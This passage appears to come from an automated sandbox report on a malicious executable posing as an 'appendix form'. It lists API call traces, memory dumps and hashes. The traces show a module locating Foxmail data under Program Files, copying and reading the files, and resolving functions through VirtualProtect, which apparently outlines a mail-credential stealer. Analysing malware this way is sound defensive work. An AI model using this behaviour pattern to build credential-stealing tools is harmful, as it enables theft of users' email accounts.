• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                              • Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction ID: cde12f86dd31b896884096c044580e22e17e4468508aba299e1a08f9367d6141
                                                                                                              • Opcode Fuzzy Hash: 5743c3f0d91b1bdb44f496c729a81979d009a58dbf752086bda617ff77998d14
                                                                                                              • Instruction Fuzzy Hash: B90171B110420EAFDF209F11DD80A9B3666E7C4754F144037FB00762D1D73A9C62ABA9
APIs
• lstrlenA.KERNEL32(00000000,00000011), ref: 004024F1
• WriteFile.KERNEL32(00000000,?,C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402510
Strings
• C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll, xrefs: 004024DF, 00402504
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: FileWritelstrlen
• String ID: C:\Users\user~1\AppData\Local\Temp\nsc44A6.tmp\System.dll
• API String ID: 427699356-3705870653
• Opcode ID: f4beac6f25d94cce8f83a24745213278be70b79441c519fa994f2423dab96886
• Instruction ID: b8daa87b0571fe9e3593993d89a4d1fc22b88d503ff9c604a545e2a39a2a9337
• Opcode Fuzzy Hash: f4beac6f25d94cce8f83a24745213278be70b79441c519fa994f2423dab96886
• Instruction Fuzzy Hash: 28F080B2A14244BFEB50EBA45E49AAB3758D740344F10443BB141F51C1D6BC4941DB6D
APIs
• FreeLibrary.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,00000000,771B2EE0,004036AB,771B3410,004034D8,?), ref: 004036EE
• GlobalFree.KERNEL32(0052A998), ref: 004036F5
Strings
• C:\Users\user~1\AppData\Local\Temp\, xrefs: 004036E6
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user~1\AppData\Local\Temp\
• API String ID: 1100898210-2382934351
• Opcode ID: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
• Instruction ID: f66ed857716bd8696a1c06da484ecea8d2aaa831b493d384aaa0c627c98861e6
• Opcode Fuzzy Hash: 46109c7d5e8f7901f06fb38b4e0fa0f424bccadd35d86ca9fbc9df7497a0603c
• Instruction Fuzzy Hash: 64E0C233801030ABC7215FA5ED0476ABB687F88B22F06442AEC007F3A0C7752C814BCD
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CE7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 004057BD
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CE7,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe,80000000,?), ref: 004057CB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3976562730
• Opcode ID: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
• Instruction ID: 0204d9c44b7810c5f580a7733e28166c0dc93526616a141743e7fa1f2396f515
• Opcode Fuzzy Hash: c27a981e79bb352b20b7a8c74a9367836393bd04b8b6ccbc39cacac652a51138
• Instruction Fuzzy Hash: 42D0A7B340CE706EF30352109C04B8F6A58CF12710F090062E141A75D0C2780C814BBE
APIs
  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,?), ref: 10001258
  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
• GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
• GlobalFree.KERNEL32(00000000), ref: 100011B4
• GlobalFree.KERNEL32(?), ref: 100011C7
• GlobalFree.KERNEL32(?), ref: 100011F5
Memory Dump Source
• Source File: 00000000.00000002.1834372877.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1834339228.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834405696.0000000010003000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1834432896.0000000010005000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: Global$Free$Alloclstrcpy
• String ID:
• API String ID: 852173138-0
• Opcode ID: 557374269f09ad200d9bf0d1f4ee52b1c16561ff9a32e2e2f2d6eea026f06a16
• Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
• Opcode Fuzzy Hash: 557374269f09ad200d9bf0d1f4ee52b1c16561ff9a32e2e2f2d6eea026f06a16
• Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 004058E6
• lstrcmpiA.KERNEL32(00405B05,00000000), ref: 004058FE
• CharNextA.USER32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 0040590F
• lstrlenA.KERNEL32(00405B05,?,00000000,00405B05,00000000,[Rename],00000000,00000000,00000000), ref: 00405918
Memory Dump Source
• Source File: 00000000.00000002.1828512369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1828485530.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1828543246.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000421000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000425000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000429000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.000000000043E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000442000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829121270.0000000000446000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1829947348.0000000000449000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: lstrlen$CharNextlstrcmpi
• String ID:
• API String ID: 190613189-0
• Opcode ID: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
• Instruction ID: c707f4e568105da07dfe4c817e4f3fc028cff82ea2bd98979edb1fd84d8cb9b2
• Opcode Fuzzy Hash: 0add82ed76356020c4ee8264c56a6ad6875436601f5ed096891bbb40787d2247
• Instruction Fuzzy Hash: 56F0C232604558FFC7129BA4DD0099EBBA8EF16360B2140AAE800F7211D274EE01ABA9

Execution Graph

Execution Coverage: 1.8%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0.5%
Total number of Nodes: 214
Total number of Limit Nodes: 5
execution_graph 8667 333e1c5b 8668 333e1c6b ___scrt_fastfail 8667->8668 8671 333e12ee 8668->8671 8670 333e1c87 8672 333e1324 ___scrt_fastfail 8671->8672 8673 333e13b7 GetEnvironmentVariableW 8672->8673 8697 333e10f1 8673->8697 8676 333e10f1 57 API calls 8677 333e1465 8676->8677 8678 333e10f1 57 API calls 8677->8678 8679 333e1479 8678->8679 8680 333e10f1 57 API calls 8679->8680 8681 333e148d 8680->8681 8682 333e10f1 57 API calls 8681->8682 8683 333e14a1 8682->8683 8684 333e10f1 57 API calls 8683->8684 8685 333e14b5 lstrlenW 8684->8685 8686 333e14d9 lstrlenW 8685->8686 8696 333e14d2 8685->8696 8687 333e10f1 57 API calls 8686->8687 8688 333e1501 lstrlenW lstrcatW 8687->8688 8689 333e10f1 57 API calls 8688->8689 8690 333e1539 lstrlenW lstrcatW 8689->8690 8691 333e10f1 57 API calls 8690->8691 8692 333e156b lstrlenW lstrcatW 8691->8692 8693 333e10f1 57 API calls 8692->8693 8694 333e159d lstrlenW lstrcatW 8693->8694 8695 333e10f1 57 API calls 8694->8695 8695->8696 8696->8670 8698 333e1118 ___scrt_fastfail 8697->8698 8699 333e1129 lstrlenW 8698->8699 8710 333e2c40 8699->8710 8702 333e1168 lstrlenW 8703 333e1177 lstrlenW FindFirstFileW 8702->8703 8704 333e11a0 8703->8704 8705 333e11e1 8703->8705 8706 333e11c7 FindNextFileW 8704->8706 8709 333e11aa 8704->8709 8705->8676 8706->8704 8707 333e11da FindClose 8706->8707 8707->8705 8709->8706 8712 333e1000 8709->8712 8711 333e1148 lstrcatW lstrlenW 8710->8711 8711->8702 8711->8703 8713 333e1022 ___scrt_fastfail 8712->8713 8714 333e10af 8713->8714 8715 333e102f lstrcatW lstrlenW 8713->8715 8716 333e10b5 lstrlenW 8714->8716 8727 333e10ad 8714->8727 8717 333e105a lstrlenW 8715->8717 8718 333e106b lstrlenW 8715->8718 8743 333e1e16 8716->8743 8717->8718 8729 333e1e89 lstrlenW 8718->8729 8721 333e10ca 8724 333e1e89 5 API calls 8721->8724 8721->8727 8722 333e1088 GetFileAttributesW 8723 333e109c 8722->8723 8722->8727 8723->8727 8735 333e173a 8723->8735 8725 333e10df 8724->8725 8748 333e11ea 8725->8748 8727->8709 8730 333e2c40 ___scrt_fastfail 8729->8730 8731 333e1ea7 lstrcatW lstrlenW 8730->8731 8732 333e1ec2 8731->8732 8733 333e1ed1 lstrcatW 8731->8733 8732->8733 8734 333e1ec7 lstrlenW 8732->8734 8733->8722 8734->8733 8736 333e1747 ___scrt_fastfail 8735->8736 8763 333e1cca 8736->8763 8739 333e199f 8739->8727 8741 333e1824 ___scrt_fastfail _strlen 8741->8739 8783 333e15da 8741->8783 8744 333e1e29 8743->8744 8747 333e1e4c 8743->8747 8745 333e1e2d lstrlenW 8744->8745 8744->8747 8746 333e1e3f lstrlenW 8745->8746 8745->8747 8746->8747 8747->8721 8749 333e120e ___scrt_fastfail 8748->8749 8750 333e1e89 5 API calls 8749->8750 8751 333e1220 GetFileAttributesW 8750->8751 8752 333e1246 8751->8752 8753 333e1235 8751->8753 8754 333e1e89 5 API calls 8752->8754 8753->8752 8756 333e173a 35 API calls 8753->8756 8755 333e1258 8754->8755 8757 333e10f1 56 API calls 8755->8757 8756->8752 8758 333e126d 8757->8758 8759 333e1e89 5 API calls 8758->8759 8760 333e127f ___scrt_fastfail 8759->8760 8761 333e10f1 56 API calls 8760->8761 8762 333e12e6 8761->8762 8762->8727 8764 333e1cf1 ___scrt_fastfail 8763->8764 8765 333e1d0f CopyFileW CreateFileW 8764->8765 8766 333e1d44 DeleteFileW 8765->8766 8767 333e1d55 GetFileSize 8765->8767 8772 333e1808 8766->8772 8768 333e1ede 22 API calls 8767->8768 8769 333e1d66 ReadFile 8768->8769 8770 333e1d7d CloseHandle DeleteFileW 8769->8770 8771 333e1d94 CloseHandle DeleteFileW 8769->8771 8770->8772 8771->8772 8772->8739 8773 333e1ede 8772->8773 8775 333e222f 8773->8775 8776 333e224e 8775->8776 8778 333e2250 8775->8778 8791 333e474f 8775->8791 8796 333e47e5 8775->8796 8776->8741 8782 333e2908 8778->8782 8803 333e35d2 8778->8803 8779 333e35d2 __CxxThrowException@8 RaiseException 8781 333e2925 8779->8781 8781->8741 8782->8779 8784 333e160c _strcat _strlen 8783->8784 8785 333e163c lstrlenW 8784->8785 8891 333e1c9d 8785->8891 8787 333e1655 lstrcatW lstrlenW 8788 333e1678 8787->8788 8789 333e167e lstrcatW 8788->8789 8790 333e1693 ___scrt_fastfail 8788->8790 8789->8790 8790->8741 8806 333e4793 8791->8806 8794 333e4765 8812 333e2ada 8794->8812 8795 333e478f 8795->8775 8801 333e56d0 _abort 8796->8801 8797 333e570e 8825 333e6368 8797->8825 8799 333e56f9 RtlAllocateHeap 8800 333e570c 8799->8800 8799->8801 8800->8775 8801->8797 8801->8799 8802 333e474f _abort 7 API calls 8801->8802 8802->8801 8805 333e35f2 RaiseException 8803->8805 8805->8782 8807 333e479f ___DestructExceptionObject 8806->8807 8819 333e5671 RtlEnterCriticalSection 8807->8819 8809 333e47aa 8820 333e47dc 8809->8820 8811 333e47d1 _abort 8811->8794 8813 333e2ae5 IsProcessorFeaturePresent 8812->8813 8814 333e2ae3 8812->8814 8816 333e2b58 8813->8816 8814->8795 8824 333e2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 8816->8824 8818 333e2c3b 8818->8795 8819->8809 8823 333e56b9 RtlLeaveCriticalSection 8820->8823 8822 333e47e3 8822->8811 8823->8822 8824->8818 8828 333e5b7a GetLastError 8825->8828 8829 333e5b99 8828->8829 8830 333e5b93 8828->8830 8834 333e5bf0 SetLastError 8829->8834 8854 333e637b 8829->8854 8847 333e5e08 8830->8847 8836 333e5bf9 8834->8836 8835 333e5bb3 8861 333e571e 8835->8861 8836->8800 8840 333e5bb9 8842 333e5be7 SetLastError 8840->8842 8841 333e5bcf 8874 333e593c 8841->8874 8842->8836 8845 333e571e _free 17 API calls 8846 333e5be0 8845->8846 8846->8834 8846->8842 8879 333e5c45 8847->8879 8849 333e5e2f 8850 333e5e47 TlsGetValue 8849->8850 8853 333e5e3b 8849->8853 8850->8853 8851 333e2ada _ValidateLocalCookies 5 API calls 8852 333e5e58 8851->8852 8852->8829 8853->8851 8859 333e6388 _abort 8854->8859 8855 333e63c8 8857 333e6368 __dosmaperr 19 API calls 8855->8857 8856 333e63b3 RtlAllocateHeap 8858 333e5bab 8856->8858 8856->8859 8857->8858 8858->8835 8867 333e5e5e 8858->8867 8859->8855 8859->8856 8860 333e474f _abort 7 API calls 8859->8860 8860->8859 8862 333e5729 HeapFree 8861->8862 8863 333e5752 __dosmaperr 8861->8863 8862->8863 8864
333e573e 8862->8864 8863->8840 8865 333e6368 __dosmaperr 18 API calls 8864->8865 8866 333e5744 GetLastError 8865->8866 8866->8863 8868 333e5c45 _abort 5 API calls 8867->8868 8869 333e5e85 8868->8869 8870 333e5ea0 TlsSetValue 8869->8870 8871 333e5e94 8869->8871 8870->8871 8872 333e2ada _ValidateLocalCookies 5 API calls 8871->8872 8873 333e5bc8 8872->8873 8873->8835 8873->8841 8885 333e5914 8874->8885 8880 333e5c71 8879->8880 8881 333e5c75 __crt_fast_encode_pointer 8879->8881 8880->8881 8882 333e5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 8880->8882 8883 333e5c95 8880->8883 8881->8849 8882->8880 8883->8881 8884 333e5ca1 GetProcAddress 8883->8884 8884->8881 8886 333e5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 8885->8886 8887 333e5938 8886->8887 8888 333e58c4 8887->8888 8889 333e5758 _abort 20 API calls 8888->8889 8890 333e58e8 8889->8890 8890->8845 8892 333e1ca6 _strlen 8891->8892 8892->8787 8893 333ec7a7 8894 333ec7be 8893->8894 8898 333ec82c 8893->8898 8894->8898 8905 333ec7e6 GetModuleHandleA 8894->8905 8896 333ec835 GetModuleHandleA 8899 333ec83f 8896->8899 8897 333ec872 8898->8896 8898->8897 8898->8899 8899->8898 8900 333ec85f GetProcAddress 8899->8900 8900->8898 8901 333ec7dd 8901->8898 8901->8899 8902 333ec800 GetProcAddress 8901->8902 8902->8898 8903 333ec80d VirtualProtect 8902->8903 8903->8898 8904 333ec81c VirtualProtect 8903->8904 8904->8898 8906 333ec7ef 8905->8906 8911 333ec82c 8905->8911 8917 333ec803 GetProcAddress 8906->8917 8908 333ec7f4 8908->8911 8912 333ec800 GetProcAddress 8908->8912 8909 333ec835 GetModuleHandleA 8914 333ec83f 8909->8914 8910 333ec872 8911->8909 8911->8910 8911->8914 8912->8911 8913 333ec80d VirtualProtect 8912->8913 8913->8911 8915 333ec81c VirtualProtect 8913->8915 8914->8911 8916 333ec85f GetProcAddress 8914->8916 8915->8911 8916->8911 8918 333ec82c 8917->8918 8919 333ec80d VirtualProtect 8917->8919 8921 333ec835 GetModuleHandleA 8918->8921 8922 333ec872 8918->8922 8919->8918 8920 
333ec81c VirtualProtect 8919->8920 8920->8918 8924 333ec83f 8921->8924 8923 333ec85f GetProcAddress 8923->8924 8924->8918 8924->8923

Control-flow Graph

APIs
• lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 333E1137
• lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1151
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E115C
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E116D
• lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E117C
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1193
• FindNextFileW.KERNELBASE(00000000,00000010), ref: 333E11D0
• FindClose.KERNEL32(00000000), ref: 333E11DB
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: lstrlen$Find$File$CloseFirstNextlstrcat
• String ID:
• API String ID: 1083526818-0
• Opcode ID: 3e71b007f64ed1a32eb5f26433e10d1415461b0df08ee1f1c5b95cd1a592b023
• Instruction ID: f059f3f6f136a515efe62f32b9677f500ccda8117e357e986b05fe691f678ca8
• Opcode Fuzzy Hash: 3e71b007f64ed1a32eb5f26433e10d1415461b0df08ee1f1c5b95cd1a592b023
• Instruction Fuzzy Hash: 9021C1729443186BD720EE64DC48F9BBBDCEF84315F044D2AB958D3190EB74DA058796

Control-flow Graph

APIs
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 333E1434
  • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 333E1137
  • Part of subcall function 333E10F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1151
  • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E115C
  • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E116D
  • Part of subcall function 333E10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 333E117C
  • Part of subcall function 333E10F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 333E1193
  • Part of subcall function 333E10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 333E11D0
  • Part of subcall function 333E10F1: FindClose.KERNEL32(00000000), ref: 333E11DB
• lstrlenW.KERNEL32(?), ref: 333E14C5
• lstrlenW.KERNEL32(?), ref: 333E14E0
• lstrlenW.KERNEL32(?,?), ref: 333E150F
• lstrcatW.KERNEL32(00000000), ref: 333E1521
• lstrlenW.KERNEL32(?,?), ref: 333E1547
• lstrcatW.KERNEL32(00000000), ref: 333E1553
• lstrlenW.KERNEL32(?,?), ref: 333E1579
• lstrcatW.KERNEL32(00000000), ref: 333E1585
• lstrlenW.KERNEL32(?,?), ref: 333E15AB
• lstrcatW.KERNEL32(00000000), ref: 333E15B7
Strings
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
• String ID: )$Foxmail$ProgramFiles
• API String ID: 672098462-2938083778
• Opcode ID: 8ec1e9a031d06fac8d6310d2703956ea554d70a5b874d9e5f4bc3ae218240f48
• Instruction ID: faf56d8e1d15b59c22afed4a1778d6b3506a75ec8aa84d9ccc18a35da020bfac
• Opcode Fuzzy Hash: 8ec1e9a031d06fac8d6310d2703956ea554d70a5b874d9e5f4bc3ae218240f48
• Instruction Fuzzy Hash: D881AF72E40368A9DB20DBA1DC85FEEB37DEF84710F004596E508E7190EAB65E84CF95

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(333EC7DD), ref: 333EC7E6
• GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
  • Part of subcall function 333EC803: GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
  • Part of subcall function 333EC803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
  • Part of subcall function 333EC803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction ID: ddfe8c0a1e950d287b84920e2c651e37e229f41df9c51d6d99b32c671016e1e1
• Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
• Instruction Fuzzy Hash: 76012257D8537038FA105E744E41AAE9F9C9B236A3B18C756E084C7693C9A08502C3A6

Control-flow Graph

APIs
• GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
  • Part of subcall function 333EC7E6: GetModuleHandleA.KERNEL32(333EC7DD), ref: 333EC7E6
  • Part of subcall function 333EC7E6: GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
  • Part of subcall function 333EC7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
  • Part of subcall function 333EC7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_333e0000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: AddressHandleModuleProcProtectVirtual
• String ID:
• API String ID: 2099061454-0
• Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction ID: 259040aa76ed53126dc4dcb40f0e25634f777ffbdbb06c4da88bb71e0648e56c
• Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
• Instruction Fuzzy Hash: F32138678883A16FFB118F748D407AE7FD89B132A2F1CC696D084CB143D5A88845C3A2

Control-flow Graph

APIs
• GetProcAddress.KERNEL32(00000000,333EC7F4), ref: 333EC804
• VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC816
• VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,333EC7F4,333EC7DD), ref: 333EC82A
• GetModuleHandleA.KERNEL32(?,333EC7DD), ref: 333EC838
• GetProcAddress.KERNEL32(00000000,00000000), ref: 333EC860
Memory Dump Source
• Source File: 00000004.00000002.2623612022.00000000333E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 333E0000, based on PE: true
• Associated: 00000004.00000002.2623547319.00000000333E0000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000004.00000002.2623612022.00000000333F6000.00000040.00001000.00020000.00000000.sdmp
